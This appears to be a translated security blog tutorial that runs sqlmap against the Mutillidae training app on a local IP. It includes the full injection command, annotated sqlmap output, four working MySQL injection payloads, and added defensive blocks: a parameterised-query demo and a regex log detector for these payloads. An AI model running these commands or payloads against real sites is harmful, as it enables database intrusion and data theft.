SQL injection vulnerabilities: automated injection with sqlmap

This article walks through using sqlmap to detect and exploit SQL injection vulnerabilities: installing sqlmap, identifying the injection point, GET-based injection with no password and no login, privilege escalation, POST-based SQL injection, strategies for higher injection test levels, and security advice on using search engines to find potentially vulnerable pages.



1. Step one: install sqlmap

root@lqh:/home/lqh# apt-get install sqlmap -y
# I am using Ubuntu here. I do have Kali, but my laptop does not have enough memory to run another VM, so I installed sqlmap directly on the physical machine.

1) Commonly used sqlmap parameters:

-p TESTPARAMETER    Testable parameter(s)                                   the parameter to inject into
--dbms=DBMS         Force back-end DBMS to this value                       specify the back-end database type
--proxy=PROXY       Use a proxy to connect to the target URL                connect to the target through a proxy
--batch             Never ask for user input, use the default behavior      fully automatic, never prompts me
--level=LEVEL       Level of tests to perform (1-5, default 1)              test level 1 to 5, 5 being the highest
--risk=RISK         Risk of tests to perform (1-3, default 1)               test risk level; the higher the risk, the faster
--cookie=COOKIE     HTTP Cookie header value                                specify the cookie value
--threads=THREADS   Max number of concurrent HTTP(s) requests (default 1)   maximum number of worker threads, default 1
-a, --all           retrieve everything; this also dumps every database and all of its contents
--dbs               Enumerate DBMS databases                                enumerate the databases
--users             enumerate the database users
--current-user      retrieve the current database user
--current-db        retrieve the current database
--tables            enumerate the tables of a given database
--columns           enumerate the columns of a given table
--dump-all          dump all databases
--dump              dump the specified database
--sql-shell         open an interactive SQL shell
--os-shell          open an interactive operating-system shell
-D                  specify the database name
-T                  specify the table name

2. Identifying the SQL injection point

Confirm the SQL injection point using error-based injection.
Confirm the SQL injection point using time-based blind injection: ' or 1=1 and sleep(10) --
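Added example (not part of the original post) showing, from the defender's side, why the two probes above and sqlmap's boolean payload work against string-concatenated SQL and why a parameterised query is immune. It uses a constructed in-memory SQLite table as a stand-in for the user-info lookup; the table, rows and function names are assumptions, not Mutillidae's real code.

```python
import sqlite3

# Constructed stand-in for the user-info lookup (not Mutillidae's real schema).
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE accounts (username TEXT, password TEXT, signature TEXT)")
    conn.executemany("INSERT INTO accounts VALUES (?, ?, ?)", [
        ("admin", "adminpass", "admin signature"),
        ("john", "johnpass", "john signature"),
    ])
    return conn

def lookup_vulnerable(conn, username):
    """String concatenation: a quote in the input closes the literal and the rest is parsed as SQL."""
    sql = "SELECT username, signature FROM accounts WHERE username = '" + username + "'"
    return conn.execute(sql).fetchall()

def lookup_safe(conn, username):
    """Parameterised query: the whole input is compared as one literal string, never parsed as SQL."""
    sql = "SELECT username, signature FROM accounts WHERE username = ?"
    return conn.execute(sql, (username,)).fetchall()

def compare(conn, username):
    """Run both lookups; a database error from the vulnerable path is returned as text.

    That error text is exactly what an error-based probe looks for: the vulnerable
    path raises on unknown SQL (SQLite has no sleep()), the safe path just finds no row.
    """
    try:
        vuln = lookup_vulnerable(conn, username)
    except sqlite3.Error as exc:
        vuln = "DB error: " + str(exc)
    return {"vulnerable": vuln, "safe": lookup_safe(conn, username)}
```

The boolean payload `-8941' OR 4953=4953-- DSmw` that sqlmap reports later in this post turns the vulnerable WHERE clause into a tautology and returns every row, while the parameterised version returns nothing.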

3. Automated injection scanning with sqlmap, GET submission (no password, no login)

root@lqh:/home/lqh# sqlmap -u "http://192.168.1.126/mutillidae/index.php?page=user-info.php&username=admin&password=admin&user-info-php-submit-button=View+Account+Details" --batch -p username --level=5 --risk=3 --dbms=mysql
/**
** The parameters first:
** --batch  let sqlmap take the default answer for everything
** -p       which parameter to test for SQL injection
** --level  the test level
** --risk   the test risk level
** --dbms   I already know the back end is MySQL, so I specified it; normally this parameter is left out, and specifying it here only makes the test result come back faster.
**/
        ___
       __H__
 ___ ___["]_____ ___ ___  {1.2.4#stable}
|_ -| . [.]     | .'| . |
|___|_  ["]_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 14:18:12

[14:18:12] [INFO] testing connection to the target URL
    // first it tests the connection to the target URL
[14:18:13] [INFO] heuristics detected web page charset 'windows-1252'
    // detects the web page character set
[14:18:13] [INFO] testing if the target URL content is stable
    // checks whether the target's content is stable
[14:18:13] [INFO] target URL content is stable
    // the target is stable
[14:18:13] [INFO] heuristics detected web page charset 'ascii'
    // web page character set detected
[14:18:13] [INFO] heuristic (basic) test shows that GET parameter 'username' might be injectable (possible DBMS: 'MySQL')
    // based on the parameter we chose, username, with MySQL as the back-end database
[14:18:13] [INFO] heuristic (XSS) test shows that GET parameter 'username' might be vulnerable to cross-site scripting (XSS) attacks
    // the test shows that the username parameter is also likely vulnerable to XSS
[14:18:13] [INFO] testing for SQL injection on GET parameter 'username'
    // starts testing the username parameter for SQL injection
[14:18:14] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
    // testing the conditional (WHERE/HAVING) clause
[14:18:14] [WARNING] reflective value(s) found and filtering out
    // reflected values are filtered out
[14:19:45] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause'
    // testing boolean-based blind injection
[14:19:51] [INFO] GET parameter 'username' appears to be 'OR boolean-based blind - WHERE or HAVING clause' injectable (with --string="Signature=")
    // there is far too much output to annotate it all......
[14:19:51] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[14:19:52] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[14:19:53] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[14:19:54] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[14:19:55] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[14:19:56] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[14:19:57] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[14:19:58] [INFO] GET parameter 'username' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable 
[14:19:58] [INFO] testing 'MySQL inline queries'
[14:19:58] [INFO] testing 'MySQL > 5.0.11 stacked queries (comment)'
[14:19:59] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[14:20:00] [INFO] testing 'MySQL > 5.0.11 stacked queries (query SLEEP - comment)'
[14:20:01] [INFO] testing 'MySQL > 5.0.11 stacked queries (query SLEEP)'
[14:20:02] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[14:20:02] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[14:20:03] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind'
[14:20:15] [INFO] GET parameter 'username' appears to be 'MySQL >= 5.0.12 AND time-based blind' injectable 
[14:20:15] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[14:20:15] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[14:20:17] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[14:20:21] [INFO] target URL appears to have 7 columns in query
[14:20:25] [INFO] GET parameter 'username' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
[14:20:25] [WARNING] in OR boolean-based injection cases, please consider usage of switch '--drop-set-cookie' if you experience any problems during data retrieval
GET parameter 'username' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 146 HTTP(s) requests:
---
Parameter: username (GET)
    Type: boolean-based blind // boolean-based blind injection point
    Title: OR boolean-based blind - WHERE or HAVING clause
    // example payload
    Payload: page=user-info.php&username=-8941' OR 4953=4953-- DSmw&password=admin&user-info-php-submit-button=View Account Details

    Type: error-based // error-based injection point
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    // example payload
    Payload: page=user-info.php&username=admin' AND (SELECT 9444 FROM(SELECT COUNT(*),CONCAT(0x7178767071,(SELECT (ELT(9444=9444,1))),0x716a717871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- JkoJ&password=admin&user-info-php-submit-button=View Account Details

    Type: AND/OR time-based blind // time-based blind injection point
    Title: MySQL >= 5.0.12 AND time-based blind
    // example payload
    Payload: page=user-info.php&username=admin' AND SLEEP(5)-- pWWL&password=admin&user-info-php-submit-button=View Account Details

    Type: UNION query // UNION query injection point
    Title: Generic UNION query (NULL) - 7 columns
    // example payload
    Payload: page=user-info.php&username=admin' UNION ALL SELECT NULL
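Added example (not from the original post): a small Python detector that scans web-server access log lines for the four payload classes sqlmap reported above (boolean-based blind, error-based, time-based blind, UNION query) plus sqlmap's default User-Agent. The combined log format, the client IP and the log lines themselves are constructed for the example, echoing the payloads printed above.

```python
import re
from urllib.parse import unquote_plus

# One regex per technique sqlmap reported against the 'username' parameter above;
# each runs on the URL-decoded, lower-cased query string of a request.
SIGNATURES = {
    "boolean-based blind": re.compile(r"'\s*(?:or|and)\s+\d+\s*=\s*\d+"),
    "error-based": re.compile(r"floor\s*\(\s*rand\s*\(\s*0\s*\)\s*\*\s*2\s*\)|information_schema"),
    "time-based blind": re.compile(r"\bsleep\s*\(\s*\d+\s*\)|\bbenchmark\s*\("),
    "UNION query": re.compile(r"\bunion\s+(?:all\s+)?select\b"),
}

# Combined log format (assumed): ip ident user [time] "request" status bytes "referer" "user-agent"
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)'
                    r' [^"]*" (?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"')

# Constructed sample lines (not a real log) echoing the payloads sqlmap printed above.
PREFIX = '192.168.1.100 - - [10/Jun/2018:14:19:51 +0800] "GET /mutillidae/index.php?page=user-info.php&username='
SQLMAP_UA = '"sqlmap/1.2.4#stable (http://sqlmap.org)"'
SAMPLE_LOG = [
    PREFIX + 'admin&password=admin HTTP/1.1" 200 5123 "-" "Mozilla/5.0"',
    PREFIX + '-8941%27%20OR%204953%3D4953--%20DSmw&password=admin HTTP/1.1" 200 5123 "-" ' + SQLMAP_UA,
    PREFIX + 'admin%27%20AND%20%28SELECT%209444%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x7178767071'
             '%2C%28SELECT%20%28ELT%289444%3D9444%2C1%29%29%29%2C0x716a717871%2CFLOOR%28RAND%280%29%2A2%29%29x'
             '%20FROM%20INFORMATION_SCHEMA.PLUGINS%20GROUP%20BY%20x%29a%29--%20JkoJ HTTP/1.1" 500 812 "-" ' + SQLMAP_UA,
    PREFIX + 'admin%27%20AND%20SLEEP%285%29--%20pWWL&password=admin HTTP/1.1" 200 5123 "-" ' + SQLMAP_UA,
    PREFIX + 'admin%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20abcd'
             ' HTTP/1.1" 200 6044 "-" ' + SQLMAP_UA,
]

def classify_request(path, user_agent=""):
    """Return the techniques whose signature matches this request (empty list if none)."""
    query = unquote_plus(path.partition("?")[2]).lower()
    hits = [name for name, rx in SIGNATURES.items() if rx.search(query)]
    if "sqlmap" in user_agent.lower():  # sqlmap announces itself in the User-Agent by default
        hits.append("sqlmap user-agent")
    return hits

def scan_log(lines):
    """Return (client ip, technique list) for every log line that matches a signature."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if m is None:  # not in combined format: skip the line rather than crash
            continue
        hits = classify_request(m["path"], m["ua"])
        if hits:
            findings.append((m["ip"], hits))
    return findings
```

Matching on the decoded query string matters because sqlmap URL-encodes the quote and spaces, so a pattern applied to the raw log line would miss them.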